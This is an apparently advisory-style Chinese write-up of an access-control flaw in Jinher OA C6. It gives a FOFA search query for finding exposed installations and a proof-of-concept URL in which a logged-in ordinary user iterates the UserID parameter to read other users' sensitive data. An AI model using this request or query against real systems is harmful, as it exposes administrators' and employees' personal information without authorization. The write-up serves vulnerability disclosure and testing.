# 金和OA C6 越权信息泄露漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

金和OA C6 存在越权信息泄露漏洞，普通用户登录后可以通过遍历ID编号获取管理员及其他用户的敏感信息

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

金和OA C6

### FOFA <a href="#fofa" id="fofa"></a>

app="Jinher-OA"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

使用普通用户登录 OA应用后台

访问的POC为

```
http://xxx.xxx.xxx.xxx/C6/JHSoft.Web.Dossier/DossierBaseInfoView.aspx?CollID=1&UserID=RY120330
```

&#x20;Note

注意 RY120330 需要为确定的其他的用户编号

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-Mhlw7RL3icMF5dl8N5_%2F-Mhm-CWrD_D9KMFgCLNx%2Fimage.png?alt=media\&token=349b6c0d-9617-4eaa-9928-c5696915d433)

泄露了部分的敏感信息

### 参考文章 <a href="#can-kao-wen-zhang" id="can-kao-wen-zhang"></a>

<https://mp.weixin.qq.com/s/gwHQVIZeMWfT8a5lBX_4WA>